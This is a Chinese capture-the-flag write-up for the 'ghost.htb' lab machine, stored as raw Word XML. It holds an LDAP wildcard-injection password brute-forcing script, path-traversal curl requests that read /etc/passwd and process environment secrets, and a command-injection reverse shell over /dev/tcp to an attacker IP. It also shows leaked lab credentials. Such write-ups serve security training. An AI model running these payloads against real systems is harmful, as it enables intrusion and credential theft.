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D7D89">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="571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DC0C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Nmap端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F9A99">
      <w:pPr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4956175"/>
            <wp:effectExtent l="0" t="0" r="190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5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0D626">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E22A487">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099969E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746AD8E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访问80端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A856C0"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3924935"/>
            <wp:effectExtent l="0" t="0" r="190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B31BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B42637F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239BDAF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61621E5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访问8008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949E11B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5C542E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="3761740"/>
            <wp:effectExtent l="0" t="0" r="889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8290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访问8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A324353"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942080"/>
            <wp:effectExtent l="0" t="0" r="381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225F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECCC14F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4AE99E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393CDC1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0112E76D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对这8008 8443进行探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77888DE9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2376805"/>
            <wp:effectExtent l="0" t="0" r="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F5614">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="3973195"/>
            <wp:effectExtent l="0" t="0" r="889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8A4F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在登陆框中输入*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4376C50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通过LDAP注入成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC2A57E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="889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480D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记住这些user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0EABC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3D671C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4044950" cy="3505200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8C670">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1359EAB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6401F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F56EC9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使用kerbrute对这些用户名进行有效验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2BBDEF"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4126230"/>
            <wp:effectExtent l="0" t="0" r="127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2D729">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B53E80F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A4369E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A51078">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDB0F69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795951EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7048BB15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DFFEDE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E4E958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6F9032">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFA97B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F1A8A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECCBE91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DFEC703">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64793D9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05E03705">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5498F2A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F758ED0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0BAF6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB8CA78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E2778A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CE9A1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338A59F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访问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"http://gitea.ghost.htb:8008/"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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://gitea.ghost.htb:8008/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66AEDC6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是一个gitea服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F444EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259DA3FA"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4027170"/>
            <wp:effectExtent l="0" t="0" r="0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E15BD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA57C3D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200E36B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使用git.py获取密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1DE90C"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102100" cy="34290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DA6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import string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4AAF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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2819536B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561387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url = 'http://intranet.ghost.htb:8008/login'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E415DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FAFF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headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB0A2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'Host': 'intranet.ghost.htb:8008',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423412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'Accept-Language': 'en-US,en;q=0.5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE2F7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'Accept-Encoding': 'gzip, deflate, br',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584EA0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'Next-Action': 'c471eb076ccac91d6f828b671795550fd5925940',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25302B3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'Connection': 'keep-alive'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED5D8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51D6B187">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAD937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files = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07394A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'1_ldap-username': (None, 'gitea_temp_principal'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFF45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'1_ldap-secret': (None, 's*'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154FBC2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'0': (None, '[{},"$K1"]')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0E12C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499B3207">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E145EDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A20450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passw = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8EC9C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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C615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for char in string.ascii_lowercase + string.digits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B199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files = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B4E3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'1_ldap-username': (None, 'gitea_temp_principal'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363882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'1_ldap-secret': (None, f'{passw}{char}*'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406232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'0': (None, '[{},"$K1"]')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8A9CF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14:paraId="6B1F78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res = requests.post(url, headers=headers, files=files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB361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if res.status_code == 303:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADBDC9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passw += char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6837C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print(f"Passwd: {passw}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490943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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4138BA9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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD4095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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79EE6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print(passw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A17DA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544BBAE6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8104B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3873500" cy="30480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84CD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gitea_temp_principal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA5DC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szrr8kpc3z6onlqf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C5F7F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A601CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6F5359">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3945255"/>
            <wp:effectExtent l="0" t="0" r="1143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7CE2A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C6B664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登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884EC5E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532D69C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6CD225">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3914140"/>
            <wp:effectExtent l="0" t="0" r="10795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7DC1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找到了一个带有API端点的存储库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF0B26B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08729C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"http://gitea.ghost.htb:8008/ghost-dev/intranet/src/branch/main/backend/src/api/dev.rs" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://gitea.ghost.htb:8008/ghost-dev/intranet/src/branch/main/backend/src/api/dev.rs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0614217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这里文件提示我们需要找到X-DEV-INTRANET-KEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E7969C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A58107">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="4240530"/>
            <wp:effectExtent l="0" t="0" r="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E8B00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A68188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我们可以执行命令bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B56D7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点击搜索按钮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042351A4"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3903980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F667F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拿到key 37395e9e872be56438c83aaca6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F7337B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1553210"/>
            <wp:effectExtent l="0" t="0" r="635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89E01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0862A6E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AFB224">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A5BE90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E52504D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B0A524">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CFD076C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A63AF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A96BF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FA22BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15750FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714B3592">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B3EC14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0503B45A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6F0CD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D13ED7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curl http://ghost.htb:8008/ghost/api/v3/content/posts/? -G --data-urlencode "key=37395e9e872be56438c83aaca6" --data-urlencode "extra=../../../../etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EE25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文件读取成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A8637">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1706A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2306955"/>
            <wp:effectExtent l="0" t="0" r="9525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DECA7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C60537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提权环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5B653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curl http://ghost.htb:8008/ghost/api/v3/content/posts/? -G --data-urlencode "key=37395e9e872be56438c83aaca6" --data-urlencode "extra=../../../../proc/self/environ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A23302"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1078865"/>
            <wp:effectExtent l="0" t="0" r="9525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BE8AF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D785AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3708A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拿到dev-key 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"mailto:!@yqr!X2kxmQ.@Xe"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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>!@yqr!X2kxmQ.@Xe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50B65ED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尝试使用dev-key进行反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F769223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curl http://intranet.ghost.htb:8008/api-dev/scan -X POST -H 'X-DEV-INTRANET-KEY:!@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url": "0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/10.10.16.33/1234; /bin/bash &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A2643D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6EE3AA"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991100" cy="12446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BF4B5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
